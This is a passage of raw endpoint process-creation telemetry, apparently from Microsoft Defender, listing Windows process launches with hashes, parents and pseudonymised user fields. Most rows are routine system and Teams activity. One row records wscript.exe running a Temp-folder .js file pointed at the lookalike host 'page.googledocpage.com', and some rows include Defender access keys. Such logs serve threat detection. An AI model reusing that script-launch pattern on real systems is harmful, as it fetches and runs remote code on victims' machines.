20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,dllhost.exe,dllhost.exe,COM Surrogate
+340,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 10:00:34.839809900+00:00,15376,OneDriveStandaloneUpdater.exe,OneDriveStandaloneUpdater.exe,PortableExecutable,2020-11-11 01:00:55.277380500+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe,2819968,29aee9be2b2db3dcd74edd0b4edad485,9642cb121af77104ea4605f8ca1ebe5a1defb3192b8778eb544f5bffc1c2f03e,e91c66460a0a34f51b6f27b0f6cac0c44ceec011,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 10:00:35.087018400+00:00,2021-06-23 10:01:58.327455600+00:00,ef33f3f3-f9c6-47ce-930d-8851fdfa14a7,computerpii_0a470890c60768167990033d701e7bd881398861,166870,False,10.7740.19041.1052,False,11540474045136925,,11540474045174830,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft OneDrive,21.099.0516.0003,OneDriveStandaloneUpdater.exe,OneDriveStandaloneUpdater.exe,Standalone Updater
+341,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 06:40:59.515763400+00:00,6940,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 978092A9-D850-8087-4B33-005A292B41A0 ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 06:40:59.699947100+00:00,2021-06-24 06:41:24.174780400+00:00,21ead361-16e6-4b02-b78a-e63dcbff4e0d,computerpii_0a470890c60768167990033d701e7bd881398861,176656,False,10.7740.19041.1052,False,11540474045145394,,11540474045176931,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+342,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 04:24:53.608537+00:00,2188,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 53AB9378-CCA4-6265-49C7-9BA9D8D7559E ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 04:24:54.126742300+00:00,2021-06-24 04:26:18.105679300+00:00,aaac0bd6-37c5-445b-95f3-0f0b88a6dee2,computerpii_0a470890c60768167990033d701e7bd881398861,175606,False,10.7740.19041.1052,False,11540474045145394,,11540474045176571,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+343,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 02:01:38.007696200+00:00,15720,sc.exe,sc.exe start wuauserv,PortableExecutable,2019-12-07 09:09:34.006180900+00:00,C:\Windows\System32\sc.exe,72192,3fb5cf71f7e7eb49790cb0e663434d80,41f067c3a11b02fe39947f9eba68ae5c7cb5bd1872a6009a4cd1506554a9aba9,b4979a9f970029889713d756c3f123643dde73da,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:01:38.037341400+00:00,2021-06-23 02:03:47.551324900+00:00,02323358-465d-4bb1-a26c-14dd346aca40,computerpii_0a470890c60768167990033d701e7bd881398861,159531,False,10.7740.19041.1052,False,11540474045136925,,11540474045172647,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,16512,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,sc.exe,sc.exe,Service Control Manager Configuration Tool
+344,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 02:01:38.023633700+00:00,11188,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,3fb5cf71f7e7eb49790cb0e663434d80,41f067c3a11b02fe39947f9eba68ae5c7cb5bd1872a6009a4cd1506554a9aba9,b4979a9f970029889713d756c3f123643dde73da,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 02:01:38.007696200+00:00,15720,sc.exe,sc.exe start wuauserv,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:01:38.037659+00:00,2021-06-23 02:03:47.551363300+00:00,ee577dc4-c5b0-4621-b0c5-73b9426a583f,computerpii_0a470890c60768167990033d701e7bd881398861,159532,False,10.7740.19041.1052,False,11540474045172647,,11540474045172648,2021-06-23 02:01:38.007696200+00:00,15720,2021-06-23 02:01:38.007696200+00:00,\Device\HarddiskVolume3\Windows\System32\sc.exe,15720,16512,ActiveProcessStartkey,C:\Windows\System32,72192,2064-01-25 04:43:49+00:00,2019-12-07 09:09:34.006180900+00:00,2021-06-23 02:01:38.017652400+00:00,2019-12-07 09:09:34.006180900+00:00,16512,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,sc.exe,sc.exe,Service Control Manager Configuration Tool,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+345,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:03:00.628056100+00:00,9044,smartscreen.exe,smartscreen.exe -Embedding,PortableExecutable,2021-06-09 01:20:39.597351200+00:00,C:\Windows\System32\smartscreen.exe,2378752,521ed922765bca8f79bd76188f879311,9605680fc164acb985c031eca2c8bc4909cf8b749c571db6de2b0b2c204c2163,183e877f488f2df9f304f60a42514a334720399f,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:03:00.652406+00:00,2021-06-23 02:03:47.552037800+00:00,2ee98a42-5da6-408f-b4f6-bc79f00c9a5f,computerpii_0a470890c60768167990033d701e7bd881398861,159552,False,10.7740.19041.1052,False,11540474045136908,,11540474045172654,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1052,smartscreen.exe,smartscreen.exe,Windows Defender SmartScreen
+346,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:57:19.450159500+00:00,14744,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,6404088009311199867,3082750514405554529,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:39.754689300+00:00,1564,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-23 00:51:38.356200500+00:00,14744,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:57:20.427168900+00:00,2021-06-23 00:58:48.010851200+00:00,c43d3948-e2e0-4227-ab7a-ed5bda108eda,computerpii_0a470890c60768167990033d701e7bd881398861,155896,False,10.7740.19041.1052,False,11540474045171817,,11540474045171992,2021-06-23 00:51:39.754689300+00:00,1564,2021-06-23 00:51:39.754689300+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1564,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,20864.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+347,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:57:33.379052100+00:00,3084,SenseCncProxy.exe,1296,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:57:33.598331900+00:00,2021-06-23 00:58:48.010984500+00:00,3a2f8894-54e7-4de4-83b0-d6eef7c37b08,computerpii_0a470890c60768167990033d701e7bd881398861,155899,False,10.7740.19041.1052,False,11540474045137006,,11540474045171994,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,16512,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+348,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:57:49.704217100+00:00,9004,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,6404088009311199867,3082750514405554529,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2604 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:39.754689300+00:00,1564,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-23 00:51:38.356200500+00:00,14744,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:57:50.542682800+00:00,2021-06-23 00:58:48.011161900+00:00,457caf28-0cd8-4a36-a122-937750d48e6a,computerpii_0a470890c60768167990033d701e7bd881398861,155903,False,10.7740.19041.1052,False,11540474045171817,,11540474045171995,2021-06-23 00:51:39.754689300+00:00,1564,2021-06-23 00:51:39.754689300+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1564,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,20864.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+349,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:12:07.454096800+00:00,19660,wscript.exe,"""wscript.exe"" ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_298ae488e59b4e9ff2badd92011032024fc2e393.js"" page.googledocpage.com/ 5",PortableExecutable,2019-12-07 09:09:07.254980200+00:00,C:\Windows\System32\wscript.exe,170496,0639b0a6f69b3265c1e42227d650b7d1,ce9f70e104c07d92fc05fbd6000839fd6a87ff010e706396f87dd679244ed97b,545ec11dee642de633eb2c6f6ffc90cce4decf8d,0639b0a6f69b3265c1e42227d650b7d1,ce9f70e104c07d92fc05fbd6000839fd6a87ff010e706396f87dd679244ed97b,545ec11dee642de633eb2c6f6ffc90cce4decf8d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:08:20.325598500+00:00,3840,wscript.exe,"wscript  ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_298ae488e59b4e9ff2badd92011032024fc2e393.js"" page.googledocpage.com/ 1 ",False,2021-06-23 03:08:19.930804700+00:00,19856,\Device\HarddiskVolume3\Windows\System32\cmd.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:12:07.527018+00:00,2021-06-23 03:14:03.927110500+00:00,0589da26-93d5-4cf3-9e21-03c356047781,computerpii_0a470890c60768167990033d701e7bd881398861,161046,False,10.7740.19041.1052,False,11540474045172986,,11540474045173008,2021-06-23 03:08:20.325598500+00:00,3840,2021-06-23 03:08:20.325598500+00:00,\Device\HarddiskVolume3\Windows\System32\wscript.exe,3840,128,ActiveProcessStartkey,C:\Windows\System32,170496,2001-02-26 12:33:54+00:00,2019-12-07 09:09:07.254980200+00:00,2021-06-23 03:08:20.364393400+00:00,2019-12-07 09:09:07.254980200+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,0.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft ® Windows Script Host,5.812.10240.16384,wscript.exe,wscript.exe,Microsoft ® Windows Based Script Host,Microsoft Corporation,Microsoft ® Windows Script Host,5.812.10240.16384,wscript.exe,wscript.exe,Microsoft ® Windows Based Script Host
+350,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:12:10.071485+00:00,18520,dllhost.exe,"""DllHost.exe"" /Processid:{776DBC8D-7347-478C-8D71-791E12EF49D8}",PortableExecutable,2020-10-09 20:47:47.793457100+00:00,C:\Windows\SysWOW64\dllhost.exe,19256,6f3c9485f8f97ac04c8e43ef4463a68c,3ed69caab035258e008efbcf40db305891b40ba02ca2737e20defa7c2d4afaf7,497b8ce238db644b7e1a16b417dbb5bc052a2684,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:12:10.277270700+00:00,2021-06-23 03:14:03.927366100+00:00,2ac61f71-afa6-4d0f-ae46-b530e246a234,computerpii_0a470890c60768167990033d701e7bd881398861,161054,False,10.7740.19041.1052,False,11540474045136908,,11540474045173009,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft 